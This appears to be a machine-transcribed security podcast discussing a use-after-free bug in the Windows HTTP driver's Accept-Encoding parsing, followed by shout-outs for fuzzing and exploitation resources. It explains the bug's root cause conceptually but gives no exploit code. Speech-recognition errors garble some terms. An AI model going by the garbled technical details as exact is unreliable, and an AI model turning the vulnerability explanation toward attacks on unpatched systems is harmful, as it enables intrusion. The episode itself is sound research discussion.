Yeah, so the header that contains the vulnerability and when it gets parsed is the accept encoding header for advertising, the compression algorithm, you want from the server and then it will respond with the content, encoding header. So for example, you can use like gzip encoding or identity. You can also set a coating and pass a weight parameter. Well, with those coding types, you can either provide valid and recognize coding, like gzip, a validly formatted, but not recognize one. Like I think AAA is one. They give an example of just anything. That would be a valid string, but just doesn't recognize or you could can pass a completely invalid one by using a semicolon or something. Inside of the coating name, the problem comes into play. When they go to parse the content coding and the fact that they keep a local doubly linked list to keep track of the nodes and when it finishes building up that list, it gets copied into a request structure and the Heap, but that local Never gets nulled out. So if you can trigger an error path by abusing like an invalid coding, for example, I believe if you can trigger a narrow path that will free the entries of the local list, in the next request, it will free the pointer some underneath that request object and cause you a f. Now I kind of got that explanation from talking to some others and looking at some proof of Concepts, because the zi post here was extremely confusing to follow. They have like four paragraphs to talk about how the doubly linked lists and is managed and what not? And maybe if you're familiar with the HTTP driver in Windows it makes sense to you. But when I was trying to model the state in my head when I was reading this post I was going crazy. So it's you know the zi zi there might be some better resources out there if you want to get a full picture of what the bug is. But yeah it is a very cool bug but it is a complex bug so I can kind of And why it was tough to explain. And if what you said is true, where it might be something for a client who would recognize their own code better. It kind of makes sense. The way it's for
not so much as a client in that sense because they do mention at the top and this is part of a report, not the entire report, this is an excerpt from a Trend Micro vulnerability of research. Service vulnerability report, So that's why I meant by for client like of Trend Micro frightening. And yeah it's the end out of tracks provided the proof of concept.
Yeah they ever thought stock has a good description of the bug.
Yes. It very concise description of the bug. Yeah, right here. The bug itself happens basically explaining Where's the bug happened? Oh, the only thing is like, I'm sure this can be Exploited. But I'd wanna, I don't know. I mean, I feel like maybe I'm being too skeptical, because, I mean, there's been all the claims about being horrible. I've seen a ton of post kind of touching on that. And just, yeah, at least, the example doesn't, but I suppose when they found it, they probably could have gone take it off to code
execution. Yeah. So, all the pox that are out there as well as zi post, they kind of stop it, triggering a kernel bug, check Which I'm I guess is kind of reasonable. You don't want to be putting weaponized, bugs out there if it is a war mobile exploit so I can kind of understand that angle.
That's where I feel like I'm just being overly. Oh We're overly cynical. Yeah. I mean I'm sure it's x 1 y mean, this is basically it's a perfect setup. You've got the dangling pointers in requests are. I'm sure it's exploitable so I probably shouldn't have even mentioned any concerned that our on-call give were mobile. It's just
Yeah. So so I did kind of want to talk about the worm will term usage mainly just because it's funny that the zi zi post has that in the title, you know, they want to get the the attention of having wearable in the title, but they never mention it again. They don't talk about like how it could be warmed or whatever. Which again I can kind of see any because you don't want to empower skins but it's just It was just a bit odd to me, but yeah, what I mean
it's I think it wasn't the out. I've definitely seen other mentions of it. I don't know exactly where the source was. If if it might have even been out of Like Patch Tuesday or something. Walked up the hill, doing the analysis are. Either way I made it is likely horrible so there's no reason really for me to do
that. Yeah, so it doesn't did come out of Patch Tuesday. I was going to touch on that. A little bit. The bug was found internally, which is good. It wasn't found being used in the wild or anything. It was found by MX, Ms, and fuzzy HD1 and that's a mess is somebody. I talk to a little bit in anti. RC. So it was cool to be able. I was actually able to talk to him a little bit about it and I sent him the zi zi post and he was saying, like the way I read the zi zi Post in the way, it was formatted. It almost seemed to me like it was a brain dump like if you found an issue like let's say you fuzzed, I think this issue was found through buzzing if you fuzzed and found a report, right? And you were trying to do some root cause analysis. This is the way I would write if I was trying to do a brain dump and just try to figure out what was going on and I kind of That when I send over the length of the zi zi post and IMAX fast was like, yeah, that's exactly what it was like. When I first found it, like, it was hard to work through the state. The only thing like with the zi zi post, I think what would have made it. Like a hundred times better was if they had a diagram, just a diagram showing, the state of what was happening with how the linked list was being managed and how that tied into the the uaf. But yeah, we're was just the paragraphs it stuff. So But yeah, like this is a pretty cool bug and once again, it's good that it was found internally and I just wanted to call that out before we move into our show, doubts. So yeah, we will move into our showed us now. Zi I'll let you take it away because we got a project zero one which I wanted to get to read but I just didn't have enough time on the weekend.
Yeah. Well buzzing iOS code on Mac OS at Native speed. Oh.
Yeah, I wasn't sure how much you read into it.
I've read over it, like I've read parts of it, I haven't gone through the entire think, it's not that long. I mean, it's got a good scroll to it but there's, you know, the code segment and stuff that said seeing some of the discussion around. So, at least want to call it out for you guys to check out like, it's basically, you know, getting iOS code to run on Mac OS mean, it's pretty much. What says, getting to that point to do Native speed fuzzing, oh, The other shout out that I've got. Is a Keno. Now, this is older weird machines, exploitability provable, non exploitability, from Tomas, DeLeon, I'm not sure if I'm saying that correctly, I've talked especially actually, because of my, the recent postponed, exploit that a bell like the concept of weird machines as being kind of an important concept to understand and grasp and kind of one of the tougher things to grasp And this keynote, I think he also wrote the paper by pretty much, same name. I've read the paper, but the keynote here, 40 minutes long. So it's not like a normal like conference paper type presentation. I thought just did a really good job at explaining it at first, it's really dry, but towards the middle when he starts talking about, you know, what is exploitation and doing the definitions that they're like it had one of the most concise definitions, I think I've ever really heard. So I want to show shout this out even though it is several years old at this
point. Yeah, it had a really good diagram when they were trying to explain like, how weird machines work. I thought that diagram was a really solid way of demonstrating what's going on. I didn't watch the full talk. I just watched like a few minutes of it that you like to that, we were still. Yeah, but yeah, I mean, the slides look, good from what I was looking at and obviously it's coming out of project zero at this point. Pretty much anything that's coming. Project zero you can expect to be good so
yeah I don't think he's I'm not sure if he's still a project zero. I feel like he left a little bit after this actually, but yeah, I mean, I don't want, is
your projects early, but I mean anything, even like in the past like anything that's really come out of them in the last, like, five years or whatever. I mean, I mean they were disestablished in like 2012 or something where they were 2014. But yeah, like all through they've been really solid with what they put out. So
Yeah, so I wanted to call this outs, like I said, um, especially in conjunction with our the series while going from like CTF style binaries to more real-world exploit Dev. This is kind of the key concept that I think need to understand to start approaching modern exploits. Yeah, whether or not you get it at all. He goes into like the formal explanations, everything, whether or not you get it there. Just understanding this concept. Don't get the idea that you need to watch us and just get everything. So he goes into a lot more. If the formal logic
also, Yeah, it's the end of chat also call. So yeah, he went on to start his own company. Okay, cool. So that, that clarifies that a little bit with with what you were bringing up. We do have another shout-out as well, which is a browser fuzzing post by Mozilla. It's not super novel if you've already looked into the buzzing space and browsers like looked at conference talks or just played around with it, there's nothing super new there but it does give a nice overview of how browser fuzzing is setup and The fuzzing pipeline at least when it comes to Firefox talking about like what kinds of sanitizers and debug builds, they use for building the fuzz. And some of the automated triaging they do with Buzz manager, as well as their own tool that they use, which is called Bug mon, which I don't think I've really seen before. I did a little bit of looking into it, when I saw this post, but yeah, just a really solid overview of, like, how a fussing pipeline Works in a like, modern monolithic Target.
Then it'll just put balancing and more of a development site tool rather than just security issue. Well, I mean, it is for security issues, but I'll
it's like an Insider
perspective. Yeah, I thought it was really cool. Actually seeing this detail out of Mozilla just seemed kind of what they're doing on that and their whole
pipeline. Yeah, it's a really good post. Even though it doesn't have anything like earth-shattering in it or whatever, it's just a really good overview. But yeah, with that said, that's all of our topics for this week. Thank you to everyone who tuned in. Vod's will be up on Twitch Spotify, YouTube, and other platforms on anchor, 24 hours after the podcast. Again, this is the last episode before the break, that doesn't mean Day. Zero will be going inactive or anything. It's just the podcast will be on. Break will still be in Discord and potentially doing streams and other video releases. So Keep an eye out for that. Also plug once more that our mini-series on going from CTF to real-world, Bone research, and exploitation, is out, and might be of interest, some of you out there. I'm also going to be putting out that vaud of the stream zi and I did where we looked at the new Ida free release, which includes their Cloud decompiler. Again, we didn't really cover the Ida free release on the podcast, but we took a look at it in the Stream and you can check out that video to see our thoughts on it. But of a tldr there were positive Club decompiler. Seems has to be pretty good and it's awesome but there's a free option. Now other than just kedra 4D compilation I should say d compilation that doesn't suck. What
if few times that we have been talking positively about Ida?